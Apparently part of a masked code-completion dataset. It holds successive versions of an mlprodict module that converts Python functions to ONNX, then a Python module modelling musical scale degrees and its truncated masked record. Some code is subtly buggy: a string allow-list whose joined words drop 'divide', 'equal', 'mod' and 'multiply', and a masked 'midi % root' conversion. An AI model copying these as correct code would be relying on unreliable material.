"step-3": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = 
{'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = 
oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if 
context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-4": "<mask token>\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh 
arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan tanh transpose'\n .split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. 
The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-5": "\"\"\"\n@file\n@brief One class which visits a syntax tree.\n\"\"\"\nimport inspect\nimport ast\nfrom textwrap import dedent\nimport numpy\nfrom scipy.spatial.distance import squareform, pdist\nfrom .node_visitor_translator import CodeNodeVisitor\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\ndef squareform_pdist(X, metric='sqeuclidean', op_version=None):\n \"\"\"\n Replacements for `squareform\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_\n and `pdist\n <http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.\n \"\"\"\n return squareform(pdist(X, metric=metric))\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp,\n 'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}\n 
allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'\n 'equal exp floor greater invert less log matmul maximum minimum mod'\n 'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())\n for k, v in numpy.__dict__.items():\n if k not in allow:\n continue\n context[f'numpy.{k}'] = v\n context[f'np.{k}'] = v\n return context\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array,\n 'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,\n 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed\n from skl2onnx.algebra.complex_functions import onnx_cdist # delayed\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError: # pragma: no cover\n # Too old version for skl2onnx.\n pass\n\n from skl2onnx.algebra import onnx_ops # delayed\n from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith(\"Onnx\") and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError( # pragma: no cover\n f\"Issue with {k}={v} (type={type(v)})\") from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False,\n context_cpl=None, output_names=None,\n dtype=numpy.float32,\n verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. 
The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {} # pragma: no cover\n try:\n obj = compile(code, \"\", \"exec\")\n except SyntaxError as e: # pragma: no cover\n raise SyntaxError(f\"Unable to compile\\n{code}\") from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l) # pylint: disable=W0122\n return context_l[name]\n\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError( # pragma: no cover\n f\"Unable to guess code from type {type(fct)}.\")\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context,\n output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None: # pragma: no cover\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
from random import shuffle, choice
from typing import Dict, List, Tuple
# Map a diatonic scale degree (1..7, 1 = tonic) to its semitone offset
# within one octave of a major scale.
note_to_midi: Dict[int, int] = {
    1: 0,
    2: 2,
    3: 4,
    4: 5,
    5: 7,
    6: 9,
    7: 11,
}

# Inverse of note_to_midi: semitone offset (pitch class relative to the
# tonic) back to the scale degree.  Chromatic offsets are deliberately
# absent, so lookups for non-diatonic pitches fail.
midi_to_note: Dict[int, int] = {
    0: 1,
    2: 2,
    4: 3,
    5: 4,
    7: 5,
    9: 6,
    11: 7,
}


class Note:
    """A diatonic scale degree, normalized to the range 1..7 (1 = tonic).

    Degrees wrap modulo 7, so ``Note(8) == Note(1)`` and
    ``Note(0) == Note(7)``.  Instances are hashable and totally ordered
    by their degree; comparing against a non-Note raises TypeError.
    """

    num: int  # normalized scale degree, always in 1..7

    @classmethod
    def choice(cls, *args: int):
        """Build a Note from one degree picked uniformly from *args*."""
        return Note(choice(args))

    @classmethod
    def from_midi(cls, midi: int, root: int):
        """Convert a MIDI pitch to a scale degree relative to *root*.

        :param midi: MIDI note number of the pitch to convert.
        :param root: MIDI note number of the tonic.
        :raises ValueError: if the pitch class is not in the major scale.
        """
        # Bug fix: the pitch class relative to the root is
        # (midi - root) % 12 — the inverse of convert_to_midi().
        # The previous expression `midi % root` only agreed with it by
        # accident (e.g. when root == 12) and raised ZeroDivisionError
        # for root == 0.
        note = midi_to_note.get((midi - root) % 12)
        if isinstance(note, int):
            return cls(note)
        raise ValueError()

    def __init__(self, num: int):
        # Wrap any integer into 1..7; equivalent to the original
        # repeated +/- 7 loops, but O(1).
        self.num = (num - 1) % 7 + 1

    def __int__(self):
        return self.num

    def __repr__(self):
        return str(self.num)

    def __str__(self):
        return f'Note: {self.num}'

    def __hash__(self):
        return hash(self.num)

    def _distance(self, other):
        """Signed degree difference to *other* (no octave wrapping)."""
        if isinstance(other, Note):
            return self.num - other.num
        # NOTE(review): raising (instead of returning NotImplemented)
        # makes every comparison against a non-Note raise TypeError;
        # kept as-is because callers may rely on it.
        raise TypeError()

    def __eq__(self, other):
        return self._distance(other) == 0

    def __lt__(self, other):
        return self._distance(other) < 0

    def __le__(self, other):
        return self._distance(other) <= 0

    def __gt__(self, other):
        return self._distance(other) > 0

    def __ge__(self, other):
        return self._distance(other) >= 0

    def _get_interval(self, interval: int):
        """Return the set of notes *interval* degrees below and above."""
        return {Note(self.num - interval), Note(self.num + interval)}

    def get_unison(self):
        return self._get_interval(0)

    def get_second(self):
        return self._get_interval(1)

    def get_thirds(self):
        return self._get_interval(2)

    def get_forth(self):
        return self._get_interval(3)

    def get_fifth(self):
        return self._get_interval(4)

    def get_sixth(self):
        return self._get_interval(5)

    def get_seventh(self):
        return self._get_interval(6)

    def inv(self):
        # Mirrors degrees 1..5 around 3 (1<->5, 2<->4, 3->3); 6 and 7
        # map to 7 and 6 via wrapping.  NOTE(review): confirm the 6/7
        # behaviour is intended.
        return Note(6 - self.num)

    def get_next_possible_notes(self, /, leap=True):
        """Return neighbouring degrees in random order.

        :param leap: when True, include leaps of a third in addition to
            stepwise motion.
        """
        neighbours = [Note(self.num - 1), Note(self.num + 1)]
        if leap:
            neighbours += [Note(self.num - 2), Note(self.num + 2)]
        shuffle(neighbours)
        return neighbours

    def __sub__(self, other) -> int:
        """Absolute interval size (0..3), taking the shorter wrap-around."""
        dist = abs(self._distance(other))
        if dist > 3:
            dist = 7 - dist
        return dist

    def get_all_possible_midi(self, root: int) -> List[int]:
        """All MIDI pitches in 0..127 sharing this degree's pitch class."""
        midi = self.convert_to_midi(root)
        assert midi >= 0
        # Drop to the lowest octave >= 0, then walk up to 127.
        while midi - 12 >= 0:
            midi -= 12
        ret: List[int] = []
        while midi <= 127:
            ret.append(midi)
            midi += 12
        return ret

    def convert_to_midi(self, root: int) -> int:
        """MIDI pitch of this degree in the octave starting at *root*."""
        return note_to_midi[self.num] + root
# Degrees eligible when choosing an inverted note; this set is closed
# under Note.inv() (2 <-> 4, 3 -> 3).
INVERSE_POSSIBLE_NOTE = {
    Note(2), Note(3), Note(4),
}
def choose_from_inverse_possible_note():
    """Pick one note uniformly at random from INVERSE_POSSIBLE_NOTE."""
    candidates = list(INVERSE_POSSIBLE_NOTE)
    return choice(candidates)
# Every diatonic degree (1..7); used as the uniform sampling pool for
# the helpers below.
ALL_NOTES = {
    Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7),
}
def choose_from_all_notes():
    """Pick one note uniformly at random from ALL_NOTES."""
    pool = list(ALL_NOTES)
    return choice(pool)
def fill_in_thirds() -> Tuple[Note, Note]:
    """Pick a random note together with one of its thirds (above or below)."""
    base = choice(list(ALL_NOTES))
    third = choice(list(base.get_thirds()))
    return base, third
|
normal
|
{
"blob_id": "d70f77713abf4b35db9de72c1edbf4bf4580b2a4",
"index": 8795,
"step-1": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n <mask token>\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n <mask token>\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n <mask token>\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while 